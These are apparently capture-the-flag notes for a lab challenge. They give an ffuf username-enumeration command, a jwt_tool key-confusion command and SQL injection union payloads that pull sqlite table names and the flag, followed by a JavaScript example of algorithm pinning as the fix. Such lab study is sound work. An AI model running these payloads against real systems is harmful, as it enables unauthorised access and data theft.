# Under Construction

\
ffuf -request req -w ../../usernames.txt -mr exists -u [http://209.97.132.64:32647/auth](http://178.62.107.125:32080/auth) -s\
\
Usernames:\
gale\
rosie\
\
• Key Confusion \[RS256 > HS256]\
./jwt\_tool.py -t <http://209.97.132.64:32365/> -rc "session=\[jwt]" -X k -pk ../../challenges/uc/pk -v\
\
• sqlite\_version()\
<> -I -pc username -pv "test123' union select 1,sqlite\_version(),3 -- "\
\
• table name\
-I -pc username -pv "test123' union select 1,(select tbl\_name from sqlite\_master limit 0,1),3 -- "\
\
• column names \[the table's CREATE query returned in the output shows the column names]\
-I -pc username -pv "test123' union select 1,(select sql from sqlite\_master limit 0,1),3 -- "\
\
• flag\
-I -pc username -pv "test123' union select 1,(select \<column-name> from \<tname> limit 0,1),3 -- "\
\
\
\-------------------------------------------------\
observations:\
\-------------------------------------------------\
• JWT public key is present in JWT token\
• ~~Enumerate usernames~~\
• JWT key confusion due to accepting both RS256 and HS256\
• SQLi is present on the getUser request because the input is not escaped
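
The key-confusion observation above, as an added example (not code from the challenge or from these notes): a verifier that lets the token header choose between RS256 and HS256, next to one that pins RS256. The key pair, function names and tokens are constructed for illustration; only Node's built-in `crypto` is used.

```javascript
// Added example: algorithm pinning as the fix for RS256 > HS256 key confusion.
const crypto = require('crypto');

const b64u = (x) => Buffer.from(x).toString('base64url');
const unb64u = (s) => Buffer.from(s, 'base64url');

// Constructed key pair standing in for the server's signing key.
const { publicKey, privateKey } = crypto.generateKeyPairSync('rsa', {
  modulusLength: 2048,
  publicKeyEncoding: { type: 'spki', format: 'pem' },
  privateKeyEncoding: { type: 'pkcs8', format: 'pem' },
});

// Sign a token; for HS256 `key` is used as the HMAC secret.
function sign(payload, alg, key) {
  const input = `${b64u(JSON.stringify({ alg, typ: 'JWT' }))}.${b64u(JSON.stringify(payload))}`;
  const sig = alg === 'RS256'
    ? crypto.sign('sha256', Buffer.from(input), key)
    : crypto.createHmac('sha256', key).update(input).digest();
  return `${input}.${b64u(sig)}`;
}

// Check a signature under one explicitly named algorithm.
function checkSig(alg, input, sig, key) {
  if (alg === 'RS256') return crypto.verify('sha256', Buffer.from(input), key, sig);
  if (alg === 'HS256') {
    const mac = crypto.createHmac('sha256', key).update(input).digest();
    return mac.length === sig.length && crypto.timingSafeEqual(mac, sig);
  }
  return false;
}

// Weak: the token's own header picks the algorithm; one key serves both.
function verifyLoose(token, key) {
  const [h, p, s] = token.split('.');
  const { alg } = JSON.parse(unb64u(h));
  return checkSig(alg, `${h}.${p}`, unb64u(s), key) ? JSON.parse(unb64u(p)) : null;
}

// Hardened: the verifier fixes RS256 and rejects any other header value.
function verifyPinned(token, key) {
  const [h, p, s] = token.split('.');
  if (JSON.parse(unb64u(h)).alg !== 'RS256') return null;
  return checkSig('RS256', `${h}.${p}`, unb64u(s), key) ? JSON.parse(unb64u(p)) : null;
}

// Constructed tokens: a legitimate one, and one keyed with the public PEM.
const legit = sign({ username: 'gale' }, 'RS256', privateKey);
const confused = sign({ username: 'rosie' }, 'HS256', publicKey);
```

`verifyLoose(confused, publicKey)` returns the payload, while `verifyPinned(confused, publicKey)` returns `null`; both accept `legit`.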
